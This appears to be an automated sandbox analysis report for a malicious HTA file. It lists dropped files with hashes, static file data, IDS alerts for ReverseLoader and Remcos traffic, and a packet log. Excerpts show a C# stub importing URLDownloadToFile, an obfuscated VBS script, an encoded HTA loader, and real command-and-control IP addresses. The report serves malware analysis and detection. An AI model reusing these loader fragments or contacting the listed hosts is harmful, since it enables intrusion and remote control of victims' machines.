SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3bb3oer.m1o.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5gfr22j.zib.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1092473844832593
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUak7YnqqaPN5Dlq5J:+RI+ycuZhNCakSaPNnqX
MD5:	10DC61A4C12511B5076D3F13198E8032
SHA1:	14779DF0DBBEA9BBB3D2737810B60944F2F04B50
SHA-256:	018A3FADEFA8A76CBF3C86DE191666CEFF7574D5DFAAC9A5892B9B2DA774164C
SHA-512:	E916692DDBA376DADC5D03A026C16DCF2D467D6F1CA477A363D4F198EEC45EEAFF62AFA552A73C48F3876F2D86362B3A606C7F3E25D2E193A9693697FF1718A8
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.1.w.u.0.j.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.y.1.w.u.0.j.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
Category:	dropped
Size (bytes):	484
Entropy (8bit):	3.733383204515497
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuIDIDa0GWmMmbjQXReKJ8SRHy4H3QMCQUWXr9M35OKy:V/DTLDfuDxXfHcEXxMJOKy
MD5:	48060B02D61C7C41DB2A78DD5BA30307
SHA1:	7064E1187A73995E4B916AC3D594014D9938A13D
SHA-256:	12C2558DDDDB21359A0A88E1E7BDD1B2C28CB56435C4F9D9796161A2F60B7BE7
SHA-512:	E522F64E687F3BA212703D2B8B5E0320E806359EB16A4FA21D08D5E27E858C82A88AABD01B82A816B96378C15013371451366E1A586E13A132DC7D0D2A86F46C
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace abfKSsSAD.{. public class ibF. {. [DllImport("UrLMoN.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr oqipTyfEW,string BGlUUEsI,string S,uint itTUxtzs,IntPtr PMl);.. }..}.

C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.24885025063046
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fJLQ+0zxs7+AEszIN723fJLQzA:p37Lvkmb6K2ahLV0WZETahLv
MD5:	B8296F61F0C165D31C0D3F86498D0E03
SHA1:	D20F35BCDB7D33ECE976D36E8E3A91E3BA485663
SHA-256:	83C512EC99A245D4C3B00CA909499CEFFEAEF0C251C84AE734A9D2812292E20B
SHA-512:	1D09ED7B54AC1284C3ED5604BB209FA57A82095CB6799250B88C85F6613ABDFD623214177904098A9C3EBC4F88A214588B35F54195D1B26911CBF5EB72D1D752
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.0.cs"

C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8293647756644433
Encrypted:	false
SSDEEP:	24:etGSpmPBe5ekrl8KLkZylYb8TSZMtkZfWwjbCZ0WI+ycuZhNCakSaPNnq:6pVskr+KxO8TSdJWwjbCZX1ulCa3Wq
MD5:	F5EB493AEF496851839CC8EA0F1E1379
SHA1:	47736D1C699EA8C177FC3A89682CB8DC879CC036
SHA-256:	8A08D298EC45944B8164BE977EF10A8AE2B6D7C6150F51BF9E0661571F4EC6BC
SHA-512:	62AE309A94F994C762217D7E86268497CFBA74E9E32FF94FB6DB8DAEC566635409D0F00C1787BCCE74C9502297ADF00BB935BB2D7C960C15C1F2BCE786F5DFA0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................5.......v.....v.......................................... <.....P ......N.........T.....^.....g.....i.....r...N.....N...!.N.....N.......!............<.......................................%..........<Module>.yy

C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
Category:	modified
Size (bytes):	876
Entropy (8bit):	5.319635132084381
Encrypted:	false
SSDEEP:	24:KOuqd3ka6K2aLVETaAKax5DqBVKVrdFAMBJTH:yika6CLVE+AK2DcVKdBJj
MD5:	009A8749BDFF299634178CF764DFF668
SHA1:	28458585133CB88CA1466616669DBFF40EC55AB9
SHA-256:	541A7D1BC58171B20B53E00EA95E04872056B7D04EC4EDC61EA44DC68D148C64
SHA-512:	3E027A997681F6D5FE4AC042F28E62630237D76734A85B6F9D5FC8E72EC6291E08824F8DAF34596E7976CC48E42684DBD85FDA0D1EDBF13475EB3E44244B4800
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3221), with CRLF line terminators
Category:	dropped
Size (bytes):	153904
Entropy (8bit):	3.7916333313217825
Encrypted:	false
SSDEEP:	3072:gyGYXHM6cErfuTpT7BgyGYXHM6cErfuTpT1gyGYXHM6cErfuTpT7:7GErSN7B7GErSN17GErSN7
MD5:	716D2EDD830102BBBAD2CB0A1A0259F1
SHA1:	720D2DB1E6C8162F89376D06F149237AD8269297
SHA-256:	5A110B1E0B3424A297618863FFA88A2DE1F09C266687F93DA8E3D7C6DAB48341
SHA-512:	EDC3624E8071E058981BF47598B654321846A4538D4F64826457108431584021CA901C16278AB74775EF64A377387427A03CD4592B711F624C463BCDB53986CA
Malicious:	true
Preview:	...... . . . .....W.O.i.K.t.G.C.e.K.u.h.I.k.i.A. .=. .".d.R.q.n.d.r.W.o.a.W.i.W.K.z.O.".....P.x.k.m.h.A.s.B.t.K.W.K.I.L.h. .=. .".L.k.h.e.I.Q.U.W.W.A.e.Q.z.U.K.".....c.A.O.k.K.j.x.m.L.K.m.k.G.c.T. .=. .".e.Z.G.K.U.m.G.q.U.C.i.G.K.a.i.".........i.K.G.b.j.f.S.p.Z.L.W.J.j.p.m. .=. .".G.c.a.W.K.u.b.g.g.n.G.L.C.P.p.".....O.s.f.L.i.i.W.I.L.u.K.c.n.k.S. .=. .".U.A.c.p.i.d.i.k.K.J.W.h.h.W.m.".....e.f.K.q.p.i.L.f.h.K.L.A.h.c.P. .=. .".m.z.W.U.h.W.Z.z.o.t.p.B.O.W.K.".....e.I.f.e.q.o.L.B.N.Z.K.N.b.d.G. .=. .".J.P.W.a.G.q.C.A.G.N.H.h.p.Z.k.".....k.A.x.g.n.b.i.L.n.z.G.R.c.v.S. .=. .".o.B.W.C.Z.N.u.G.h.p.z.c.f.H.c.".....G.k.U.z.b.L.B.f.Q.z.N.p.f.L.L. .=. .".b.O.i.N.p.L.U.A.h.u.K.f.G.b.c.".....W.p.e.e.i.j.J.i.N.L.C.a.k.a.G. .=. .".W.q.L.p.U.P.a.i.W.K.j.W.d.N.i.".....U.a.K.r.K.W.i.p.O.Z.x.o.o.B.s. .=. .".z.W.A.c.L.U.r.m.z.I.L.e.m.O.U.".....G.k.P.N.G.f.z.z.a.i.t.O.i.L.n. .=. .".q.r.L.A.k.W.U.b.L.g.b.a.i.L.G.".....A.B.j.T.f.j.C.P.W.l.h.u.s.a.U. .=. .".W.L.P.b.U.h.K.K.i.N.S.L.A.U.H.".....m.G.e.K.f.d.t.d.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Entropy (8bit):	2.4638385282510207
TrID:
File name:	creamkissingthingswithcreambananapackagecreamy.hta
File size:	82'678 bytes
MD5:	049640aa09b45f8f374ec9fff6e272e5
SHA1:	ca0990ea3db24491c5a5ce408b921383b0d74db8
SHA256:	277bce05fe87b2c2edd725dc6bc75c98a9f3d3fc68159a65471625009fe0e9e7
SHA512:	044cc9e601d6809ae166a99c91656b54fc602d088edba57013f2575ebe2e2dd0200e29335494977479a5ed04d81313d5b4816a7ec419e14df95f773133c9a7cc
SSDEEP:	768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHA/OxlbVxP7iZ5VQSG/wa3s+RP7i2dfwwwAkKD:tk
TLSH:	E0837907554BE93C7F87A9FBE33CD92A52C6AD01EF8E890706FC09551AD5F8EB024894
File Content Preview:	<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T07:38:26.393804+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.6	49708	192.210.150.24	80	TCP
2024-12-13T07:38:36.827575+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	151.101.1.137	443	192.168.2.6	49715	TCP
2024-12-13T07:38:53.629074+0100	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.6	49771	104.21.84.67	443	TCP
2024-12-13T07:38:54.029867+0100	2020424	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1	1	104.21.84.67	443	192.168.2.6	49771	TCP
2024-12-13T07:38:54.029867+0100	2020425	ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2	1	104.21.84.67	443	192.168.2.6	49771	TCP
2024-12-13T07:38:54.999503+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	104.21.84.67	443	192.168.2.6	49771	TCP
2024-12-13T07:38:57.484695+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49778	107.173.143.10	14646	TCP
2024-12-13T07:39:00.557990+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49788	107.173.143.10	14646	TCP
2024-12-13T07:39:03.635150+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49794	107.173.143.10	14646	TCP
2024-12-13T07:39:06.714457+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49801	107.173.143.10	14646	TCP
2024-12-13T07:39:09.795351+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49810	107.173.143.10	14646	TCP
2024-12-13T07:39:12.870517+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49818	107.173.143.10	14646	TCP
2024-12-13T07:39:15.949037+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49827	107.173.143.10	14646	TCP
2024-12-13T07:39:19.026891+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49836	107.173.143.10	14646	TCP
2024-12-13T07:39:22.129857+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49843	107.173.143.10	14646	TCP
2024-12-13T07:39:25.217756+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49851	107.173.143.10	14646	TCP
2024-12-13T07:39:28.292064+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49860	107.173.143.10	14646	TCP
2024-12-13T07:39:31.369970+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49869	107.173.143.10	14646	TCP
2024-12-13T07:39:34.452551+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49876	107.173.143.10	14646	TCP
2024-12-13T07:39:37.526346+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49885	107.173.143.10	14646	TCP
2024-12-13T07:39:40.604671+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49892	107.173.143.10	14646	TCP
2024-12-13T07:39:43.699447+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49900	107.173.143.10	14646	TCP
2024-12-13T07:39:46.780365+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49909	107.173.143.10	14646	TCP
2024-12-13T07:39:49.855713+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49917	107.173.143.10	14646	TCP
2024-12-13T07:39:52.952850+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49925	107.173.143.10	14646	TCP
2024-12-13T07:39:56.046189+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49934	107.173.143.10	14646	TCP
2024-12-13T07:39:59.468403+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49943	107.173.143.10	14646	TCP
2024-12-13T07:40:02.593669+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49951	107.173.143.10	14646	TCP
2024-12-13T07:40:05.693031+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49958	107.173.143.10	14646	TCP
2024-12-13T07:40:08.796633+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49966	107.173.143.10	14646	TCP
2024-12-13T07:40:11.872217+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49974	107.173.143.10	14646	TCP
2024-12-13T07:40:14.964552+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49983	107.173.143.10	14646	TCP
2024-12-13T07:40:18.199825+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49990	107.173.143.10	14646	TCP
2024-12-13T07:40:21.277536+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49998	107.173.143.10	14646	TCP
2024-12-13T07:40:24.355592+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50006	107.173.143.10	14646	TCP
2024-12-13T07:40:27.434885+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50015	107.173.143.10	14646	TCP
2024-12-13T07:40:30.512640+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50018	107.173.143.10	14646	TCP
2024-12-13T07:40:33.691995+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50019	107.173.143.10	14646	TCP
2024-12-13T07:40:36.765951+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50020	107.173.143.10	14646	TCP
2024-12-13T07:40:39.817468+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50021	107.173.143.10	14646	TCP
2024-12-13T07:40:42.824567+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50022	107.173.143.10	14646	TCP
2024-12-13T07:40:45.793353+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50023	107.173.143.10	14646	TCP
2024-12-13T07:40:48.750424+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50024	107.173.143.10	14646	TCP
2024-12-13T07:40:51.668613+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50025	107.173.143.10	14646	TCP
2024-12-13T07:40:54.585616+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50026	107.173.143.10	14646	TCP
2024-12-13T07:40:57.449727+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50027	107.173.143.10	14646	TCP
2024-12-13T07:41:00.590897+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50028	107.173.143.10	14646	TCP
2024-12-13T07:41:03.405549+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50029	107.173.143.10	14646	TCP
2024-12-13T07:41:06.220764+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50030	107.173.143.10	14646	TCP
2024-12-13T07:41:09.028196+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50032	107.173.143.10	14646	TCP
2024-12-13T07:41:11.763701+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50033	107.173.143.10	14646	TCP
2024-12-13T07:41:14.501227+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50034	107.173.143.10	14646	TCP
2024-12-13T07:41:17.204841+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50035	107.173.143.10	14646	TCP
2024-12-13T07:41:19.876654+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50036	107.173.143.10	14646	TCP
2024-12-13T07:41:22.528370+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50037	107.173.143.10	14646	TCP
2024-12-13T07:41:25.173375+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50038	107.173.143.10	14646	TCP
2024-12-13T07:41:27.798618+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50039	107.173.143.10	14646	TCP
2024-12-13T07:41:30.449599+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50040	107.173.143.10	14646	TCP
2024-12-13T07:41:33.032754+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50041	107.173.143.10	14646	TCP
2024-12-13T07:41:35.613608+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50042	107.173.143.10	14646	TCP
2024-12-13T07:41:38.138463+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50043	107.173.143.10	14646	TCP
2024-12-13T07:41:40.676629+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50044	107.173.143.10	14646	TCP
2024-12-13T07:41:43.185847+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50045	107.173.143.10	14646	TCP
2024-12-13T07:41:45.707695+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50046	107.173.143.10	14646	TCP
2024-12-13T07:41:48.217483+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50047	107.173.143.10	14646	TCP
2024-12-13T07:41:50.687440+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50048	107.173.143.10	14646	TCP
2024-12-13T07:41:53.138305+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50049	107.173.143.10	14646	TCP
2024-12-13T07:41:55.591617+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50050	107.173.143.10	14646	TCP
2024-12-13T07:41:58.057647+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50051	107.173.143.10	14646	TCP
2024-12-13T07:42:00.828623+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50052	107.173.143.10	14646	TCP
2024-12-13T07:42:03.248163+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50053	107.173.143.10	14646	TCP
2024-12-13T07:42:05.655495+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50054	107.173.143.10	14646	TCP
2024-12-13T07:42:08.045202+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50055	107.173.143.10	14646	TCP
2024-12-13T07:42:10.421554+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50057	107.173.143.10	14646	TCP
2024-12-13T07:42:12.828519+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50058	107.173.143.10	14646	TCP
2024-12-13T07:42:15.191736+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50059	107.173.143.10	14646	TCP
2024-12-13T07:42:17.546059+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50060	107.173.143.10	14646	TCP
2024-12-13T07:42:19.874365+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50061	107.173.143.10	14646	TCP
2024-12-13T07:42:22.311362+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50062	107.173.143.10	14646	TCP
2024-12-13T07:42:24.639244+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50063	107.173.143.10	14646	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 07:38:25.163310051 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:25.283294916 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:25.283391953 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:25.283585072 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:25.403287888 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393687010 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393726110 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393735886 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393804073 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.393851995 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393862963 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393872976 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393883944 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393896103 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.393919945 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.393919945 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.393963099 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.394057035 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.394095898 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.394110918 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.394154072 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.513797998 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.513869047 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.513911009 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.514009953 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.517882109 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.517959118 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.585793018 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.585896969 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.585906982 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.585966110 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.588217020 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.588315010 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.588376045 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.588476896 CET	49708	80	192.168.2.6	192.210.150.24
Dec 13, 2024 07:38:26.596622944 CET	80	49708	192.210.150.24	192.168.2.6
Dec 13, 2024 07:38:26.596709013 CET	49708	80	192.168.2.6	192.210.150.24
